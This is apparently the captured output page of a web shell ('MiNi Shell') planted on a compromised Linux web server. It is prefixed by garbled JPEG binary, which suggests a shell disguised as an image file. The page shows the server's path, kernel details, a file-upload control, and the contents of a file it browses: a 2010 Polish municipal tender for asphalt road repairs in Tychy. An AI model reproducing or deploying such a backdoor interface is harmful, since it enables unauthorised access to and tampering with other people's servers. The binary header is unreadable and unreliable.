JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100111/5957-N-2010.html

<p class="kh_header"><b>Tychy: Remonty cząstkowe i remonty nawierzchni bitumicznych dróg i ulic na terenie miasta Tychy w 2010 roku</b><br>
<b>Numer ogłoszenia: 5957 - 2010; data zamieszczenia: 11.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Budowlanych 59, 43-100 Tychy, woj. śląskie, tel. 032 227-70-06, 3271491, faks 032 2277008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty cząstkowe i remonty nawierzchni bitumicznych dróg i ulic na terenie miasta Tychy w 2010 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na cztery zadania:

Zadanie I - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach krajowych

1. remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową.


Zadanie II - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach powiatowych

1. remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową.


Zadanie III - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach gminnych

1. remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową.

Zadanie IV - Remonty nawierzchni bitumicznych mieszanką mineralno-bitumiczną (łaty od 2 m2 w zwyż) na terenie całego miasta

1. remonty nawierzchni bitumicznych mieszanką mineralno-bitumiczną (łaty od 2 m2 w zwyż)
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- ułożenie podbudowy z betonu asfaltowego o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy wiążącej z BA o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy ścieralnej z BA o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy ścieralnej z mieszanki grysowo-mastyksowej (SMA) 
2. remont podbudowy z kruszywa
3. ułożenie krawężników
4. wysokościową regulację urządzeń obcych
5. opracowanie projektu tymczasowego oznakowania dla dróg krajowych wraz z montażem oznakowania.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8, 45.23.31.41-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:
- 2.200,00 - dla zadania I
- 5.250,00 - dla zadania II
- 3.000,00 - dla zadania III
- 12.000,00 - dla zadania IV
najpóźniej do dnia 02.02.2010 r. do godz. 9:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 pzp, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2. posiadania wiedzy i doświadczenia;
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4. sytuacji ekonomicznej i finansowej.
Zamawiający ustala następujący szczegółowy warunek udziału w postępowaniu w zakresie warunku wskazanego w punkcie 2:
a). udokumentowanie wykonania w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej w zakresie niezbędnym do wykazania spełnienia warunku doświadczenia, tzn. roboty polegającej na budowie lub remoncie drogi w technologii asfaltobetonu.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.  
Zamawiający ustala następujący szczegółowy warunek udziału w postępowaniu w zakresie warunku wskazanego w punkcie 3:
a) wykazanie niezbędnych do wykonania zamówienia narzędzi i urządzeń jn., którymi dysponuje wykonawca:
Zadanie I, II i III
- młot pneumatyczny - 2 szt.
- piła do cięcia asfaltu - 2 szt.
- ubijaki mechaniczne - 2 szt.
- recykler - 2 szt.
- walec wibracyjny o min. wadze 600 kg - 1 szt.
- strzała świetlna - 1 szt.
- samochód dostawczy - 2 szt.
Zadanie IV
- młot pneumatyczny - 1 szt.
- piła do cięcia asfaltu - 1 szt.
- ubijaki mechaniczne - 1 szt.
- frezarka - 1 szt.
- skrapiarka - 1 szt.
- walec statyczny - 1 szt.
- walec wibracyjny - 1 szt.
- rozściełacz - 1 szt.
- recykler - 1 szt.
- remonter - 1 szt.
- strzała świetlna - 1 szt.
- samochód dostawczy - 2 szt.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie. 
b) wykazanie, iż wykonawca dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.:
- jedną osobą kadry technicznej (kierownik budowy) posiadającą uprawnienia do kierowania robotami budowlanymi w branży drogowej lub konstrukcyjno - budowlanej bez ograniczeń w zakresie odpowiadającym  przedmiotowi zamówienia.
Osoba odpowiedzialna za realizację ww. funkcji, zgodnie z obowiązującymi przepisami winna posiadać stosowne uprawnienia zawodowe oraz zaświadczenie o przynależności do właściwej Okręgowej Izby - dotyczy zadania I, II, III i IV
W przypadku, gdy wykonawca złoży ofertę na dwa zadania w poszczególnych załącznikach WYKAZ OSÓB na stanowisku kierownika budowy wykazana może być ta sama osoba.  
- min. dwiema brygadami roboczymi zdolnymi do jednoczesnego wykonywania przedmiotu zamówienia - dotyczy zadania I, II i III
- min. jedną brygadą roboczą zdolną do jednoczesnego wykonywania przedmiotu zamówienia - dotyczy zadania IV
- co najmniej 2 osobami posiadającymi zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym wydane przez Wojewódzka Komendę Policji lub Wojewódzki Ośrodek Ruchu Drogowego - dotyczy zadania I, II, III i IV
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.  

Ocena spełnienia tych warunków odbywać się będzie na zasadzie spełnia - nie spełnia na podstawie złożonych oświadczeń i załączonych dokumentów wymaganych przez zamawiającego zgodnie ustawą Prawo zamówień publicznych oraz określonych w Rozporządzeniu Prezesa Rady Ministrów (Dz. U. Nr 226, poz. 1817) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zgodnie z art. 24 ust. 2 pkt 4, art. 26 ust. 2 pzp i rozporządzeniem Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) zamawiający żąda złożenia następujących oświadczeń i dokumentów:     
1. w celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pzp oraz spełniania szczegółowych warunków wskazanych przez zamawiającego, o których mowa w pkt 3 siwz, należy załączyć następujące dokumenty:
a). wykaz co najmniej 1 roboty budowlanej w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia wykonanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej rodzaju i wartości, daty i miejsca wykonania tj. zał. DOŚWIADCZENIE ZAWODOWE wraz z załączeniem dokumentu potwierdzającego, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
c). wykaz narzędzi i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia - tj. zał. WYKAZ NARZEDZI I URZĄDZEŃ wraz z informacją o podstawie dysponowania tymi zasobami.
d). wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności tj. zał. WYKAZ OSÓB oraz informacją o podstawie do dysponowania tymi osobami.
e) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (kierownik budowy, osoby do kierowania ruchem) posiadają wymagane uprawnienia. 

Zgodnie z art. 26 ust. 2b pzp wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2. w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 pzp, należy załączyć następujące dokumenty:
a) oświadczenie o braku podstaw do wykluczenia 
b) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy
W przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez  każdy podmiot.
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
W przypadku składania oferty przez podmioty występujące wspólnie informacja musi być złożona przez  każdy podmiot.
d) aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
W przypadku składania oferty przez podmioty występujące wspólnie informacja musi być złożona przez  każdy podmiot.
e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
W przypadku składania oferty przez podmioty występujące wspólnie informacja musi być złożona przez  każdy podmiot.
f) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
Dokument ten zobowiązani są złożyć wykonawcy będący podmiotami zbiorowymi w rozumieniu ustawy z dnia 28.10.2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. Nr 197, poz. 1661).
W przypadku składania oferty przez podmioty występujące wspólnie informacja musi być złożona przez  każdy podmiot.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z przepisami rozporządzenia wykonawczego do pzp w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Rozporządzenie Prezesa Rady Ministrów Dz. U. Nr 226, poz. 1817).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzuim.tychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2010 godzina 09:00, miejsce: Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach krajowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach powiatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - Remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową na drogach gminnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną grysową:
- na gorąco metodą tradycyjną,
- na zimno,
- z recyklera z zastosowaniem destruktu asfaltowego,
- z remontera przy zastosowaniu grysu i emulsji asfaltowej,
- naprawa podłużnych i poprzecznych spękań nawierzchni masa zalewową asfaltową.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV - Remonty nawierzchni bitumicznych mieszanką mineralno-bitumiczną (łaty od 2 m2 w zwyż) na terenie całego miasta.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. remonty nawierzchni bitumicznych mieszanką mineralno-bitumiczną (łaty od 2 m2 w zwyż)
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- ułożenie podbudowy z betonu asfaltowego o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy wiążącej z BA o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy ścieralnej z BA o zwiększonej odporności na odkształcenia trwałe,
- ułożenie warstwy ścieralnej z mieszanki grysowo-mastyksowej (SMA) 
2. remont podbudowy z kruszywa
3. ułożenie krawężników
4. wysokościową regulację urządzeń obcych
5. opracowanie projektu tymczasowego oznakowania dla dróg krajowych wraz z montażem oznakowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com